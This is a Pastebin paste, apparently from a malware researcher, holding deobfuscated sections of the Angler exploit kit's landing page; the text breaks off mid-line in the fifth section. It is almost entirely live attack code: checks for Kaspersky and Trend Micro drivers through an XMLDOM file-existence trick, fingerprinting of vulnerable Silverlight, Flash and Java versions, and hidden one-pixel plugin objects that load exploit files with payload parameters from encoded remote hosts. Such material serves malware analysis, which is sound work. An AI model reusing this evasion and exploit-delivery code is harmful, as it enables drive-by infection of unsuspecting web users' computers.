Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #####
- Angler exploit kit deobfuscated sections
- @tehsyntx
- thembits.blogspot.se
- The sections are from the span-tags located at the top of the landingpage.
- #####
- Section one:
- function gs7sfd(txt) {
- var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
- xmlDoc.async = true;
- xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + txt + '">');
- if (xmlDoc.parseError.errorCode != 0) {
- var err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
- err += "Error Reason: " + xmlDoc.parseError.reason;
- err += "Error Line: " + xmlDoc.parseError.line;
- if (err.indexOf("-2147023083") > 0) {
- return 1;
- } else {
- return 0;
- }
- }
- return 0;
- }
- if (gs7sfd("c:\\Windows\\System32\\drivers\\kl1.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmactmon.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmcomm.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmevtmgr.sys") || gs7sfd("c:\\windows\\system32\\drivers\\TMEBC32.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmeext.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmnciesc.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmtdi.sys")) {
- window['zxtbVDMp'] = true;
- BzJUQufh = '';
- window.sf325gtgs7sfdj = window.sf325gtgs7sfds = window.sf325gtgs7sfdf1 = window.sf325gtgs7sfdf2 = false;
- };
- #############################################################
- Section two:
- if (!Array.prototype.indexOf) {
- Array.prototype.indexOf = function(obj, start) {
- for (var i = (start || 0), j = this.length; i < j; i++) {
- if (this[i] === obj) {
- return i;
- }
- }
- return -1;
- };
- }
- window.bbERD = new Function('text', "var cryptKey = SnDCSH0, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray.push(rawArray.indexOf(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;");
- var xObjectName = 'ActiveXObject';
- var xObject = window[xObjectName];
- var AgControl = 'AgControl.AgControl';
- function silverVersion(value) {
- var nav = navigator.plugins["Silverlight Plug-In"];
- if (nav) {
- return testVersion(nav.description);
- } else {
- try {
- var control = new ActiveXObject('AgControl.AgControl');
- var vers = Array(1, 0, 0, 0);
- loopVersion(control, vers, 0, 1);
- loopVersion(control, vers, 1, 1);
- loopVersion(control, vers, 2, 10000);
- loopVersion(control, vers, 2, 1000);
- loopVersion(control, vers, 2, 100);
- loopVersion(control, vers, 2, 10);
- loopVersion(control, vers, 2, 1);
- loopVersion(control, vers, 3, 1);
- return testVersion(vers.join('.'));
- } catch (e) {
- return testVersion(false);
- }
- }
- function testVersion(currentVersion) {
- if (!currentVersion) return currentVersion;
- if (parseInt(String(currentVersion).replace(/\./g, '')) > parseInt(String(value).replace(/\./g, ''))) return 1;
- if (parseInt(String(currentVersion).replace(/\./g, '')) == parseInt(String(value).replace(/\./g, ''))) return 0;
- if (parseInt(String(currentVersion).replace(/\./g, '')) < parseInt(String(value).replace(/\./g, ''))) return -1;
- }
- function loopVersion(control, vers, idx, inc) {
- while (IsSupported(control, vers)) {
- vers[idx] += inc;
- }
- vers[idx] -= inc;
- }
- function IsSupported(control, ver) {
- return control.isVersionSupported(ver[0] + "." + ver[1] + "." + ver[2] + "." + ver[3]);
- }
- }
- function flashVersion(versionValue) {
- var a = !1,
- res, ver = fixNumber(versionValue);
- function fixNumber(num) {
- function beautify(match, number) {
- var res = "000" + match;
- return (res).substr(res.length - 3)
- }
- var n = num.split(".");
- result = n[0] + n[1].replace(/\d+/g, beautify) + n[2].replace(/\d+/g, beautify);
- return n.length > 3 ? result + n[3].replace(/\d+/g, beautify) : result;
- }
- function version(b) {
- if (!b) {
- return null
- };
- b = fixNumber(String(b).replace(/^[^0-9]+/g, '').replace(/[^0-9\.]/g, '.').replace(/\.+/g, '.').replace(/\,/g, '.'));
- if (!b) {
- return null
- };
- var verTest = parseInt(ver.substr(0, b.length));
- if (parseInt(b) > verTest) {
- return 1;
- }
- if (parseInt(b) == verTest) {
- return 0;
- }
- return -1;
- }
- function createFlash() {
- var obj = document.createElement("object"),
- newDiv = document.createElement("div"),
- id = String("flash" + new Date()).replace(/\s|\+|\:/g, '');
- newDiv.style.cssText = 'position:absolute;top:-1000px;left:-1000px;';
- obj.setAttribute("type", "application/x-shockwave-flash");
- obj.style.cssText = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;display:inline;width:1px;height:1px";
- obj.setAttribute("width", "1");
- obj.setAttribute("id", id);
- obj.setAttribute("height", "1");
- obj.id = id;
- newDiv.appendChild(obj);
- document.body.appendChild(newDiv);
- result = String(obj.GetVariable("$version"));
- return result;
- }
- if (navigator.plugins && navigator.plugins.length) {
- var e = navigator.plugins["Shockwave Flash"];
- e && (a = !0, e.description && (b = e.description));
- navigator.plugins["Shockwave Flash 2.0"] && (a = !0, b = "2.0.0.11");
- res = version(b);
- if (res > 0 || res < 0) return res;
- try {
- return version(createFlash());
- } catch (e) {
- return;
- }
- } else {
- if (navigator.mimeTypes && navigator.mimeTypes.length) {
- var f = navigator.mimeTypes["application/x-shockwave-flash"];
- (a = f && f.enabledPlugin) && (b = f.enabledPlugin.description);
- res = version(b);
- if (res > 0 || res < 0) return res;
- try {
- return version(createFlash());
- } catch (e) {
- return;
- }
- } else {
- try {
- var g = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"),
- a = !0,
- b = g.GetVariable("$version");
- return version(b);
- } catch (h) {
- try {
- g = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6"), a = !0, b = "6.0.21";
- return;
- } catch (i) {
- try {
- g = new ActiveXObject("ShockwaveFlash.ShockwaveFlash"), a = !0, b = g.GetVariable("$version");
- return version(b);
- } catch (j) {}
- }
- }
- }
- }
- return;
- }
- var minValue = silverVersion("4.0.50401.0"),
- maxValue = silverVersion("5.1.10411.0"),
- currentValue = silverVersion("5.0.60818.0");
- if (typeof(minValue) != 'undefined' && typeof(maxValue) != 'undefined' && typeof(currentValue) != 'undefined' && minValue >= 0 && maxValue <= 0 && currentValue != 0) {
- window.sf325gtgs7sfds = true;
- } else {
- var ua = window.navigator.userAgent,
- FF = ua.toLowerCase().indexOf('firefox') > 0,
- IE = ua.indexOf('MSIE ') > 0 || ua.indexOf('Trident/') > 0;
- if ((IE || FF) && ((flashVersion("11.3.300.257") >= 0 && flashVersion("11.7.700.275") <= 0) || (flashVersion("11.8.800.94") >= 0 && flashVersion("13.0.0.182") <= 0))) {
- if (!(FF && flashVersion("11.3.000.000") >= 0 && navigator.appVersion.indexOf('Windows NT 6') >= 0)) {
- if (!((navigator.userAgent.indexOf("Win64") == -1 && navigator.userAgent.indexOf("x64") == -1) && (flashVersion("11.7.700.275") == 0 || flashVersion("13.0.0.182") == 0))) {
- window.sf325gtgs7sfdf1 = true;
- }
- }
- }
- } if (navigator.javaEnabled()) {
- window.sf325gtgs7sfdj = true;
- }
- var Browser = {
- Version: function() {
- try {
- var birks = /malware.dontneedcoffee.com/.test();
- } catch (e) {}
- var version = 999;
- if (navigator.appVersion.indexOf("MSIE") != -1) version = parseFloat(navigator.appVersion.split("MSIE")[1]);
- return version;
- }
- };
- if (!window.sf325gtgs7sfdj && !window.sf325gtgs7sfds && !window.sf325gtgs7sfdf1 && !window.sf325gtgs7sfdf2 && (Browser.Version() > 10)) {
- var urlName = decIt(SnDCSH1);
- document.location.href = "/" + urlName;
- }
- #############################################################
- Section three:
- if (window.sf325gtgs7sfds && !window.sf325gtgs7sfdf1) {
- var klfg1 = 'wri',
- klfg2 = 'te';
- function getKolaio() {
- return bbERD(SnDCSH2);
- }
- function getTxl() {
- return bbERD(SnDCSH3);
- }
- function getData() {
- return bbERD(SnDCSH4);
- }
- document[klfg1 + klfg2]('<form id="form1" runat="server" style="height: 100%"><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="http://' + getKolaio() + '/' + getTxl() + '" /><param name="initParams" value="exteeec=' + getData() + '"/></object></div></form>');
- }
- #############################################################
- Section four:
- if (window.sf325gtgs7sfdf1 && !window.sf325gtgs7sfds) {
- var klfg1 = 'wri',
- klfg2 = 'te';
- function getKolaio() {
- return bbERD(SnDCSH5);
- }
- function getTxl(a) {
- return bbERD(SnDCSH6);
- }
- function getData(a) {
- return bbERD(SnDCSH7);
- }
- var mirtul = "1";
- var txt = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" /><param name=FlashVars value="exec=' + getData(mirtul) + '" />';
- txt = txt + '<!--[if !IE]>--><object type="application/x-shockwave-flash" data="http://';
- txt = txt + getKolaio() + '/' + getTxl(mirtul) + '" allowScriptAccess=always width="1" height="1"><param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />';
- txt = txt + '<param name=FlashVars value="exec=' + getData(mirtul) + '" /><!--<![endif]--><!--[if !IE]>--></object><!--<![endif]--></object>';
- document[klfg1 + klfg2](txt);
- }
- #############################################################
- Section five:
- var ldklfgo;
- var klfg1 = 'wri',
- klfg2 = 'te';
- ldklfgo = {
- isDefined: function(b) {
- return typeof b != "undefined"
- },
- isArray: function(b) {
- return (/array/i).test(Object.prototype.toString.call(b))
- },
- isFunc: function(b) {
- return typeof b == "function"
- },
- isString: function(b) {
- return typeof b == "string"
- },
- isNum: function(b) {
- return typeof b == "number"
- },
- isStrNum: function(b) {
- return (typeof b == "string" && (/\d/).test(b))
- },
- getNumRegx: /[\d][\d\.\_,\-]*/,
- splitNumRegx: /[\.\_,\-]/g,
- getNum: function(b, c) {
- var d = this,
- a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
- return a ? a[0] : null
- },
- compareNums: function(h, f, d) {
- var e = this,
- c, b, a, g = parseInt;
- if (e.isStrNum(h) && e.isStrNum(f)) {
- if (e.isDefined(d) && d.compareNums) {
- return d.compareNums(h, f)
- }
- c = h.split(e.splitNumRegx);
- b = f.split(e.splitNumRegx);
- for (a = 0; a < Math.min(c.length, b.length); a++) {
- if (g(c[a], 10) > g(b[a], 10)) {
- return 1
- }
- if (g(c[a], 10) < g(b[a], 10)) {
- return -1
- }
- }
- }
- return 0
- },
- formatNum: function(b, c) {
- var d = this,
- a, e;
- if (!d.isStrNum(b)) {
- return null
- }
- if (!d.isNum(c)) {
- c = 4
- }
- c--;
- e = b.repl
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement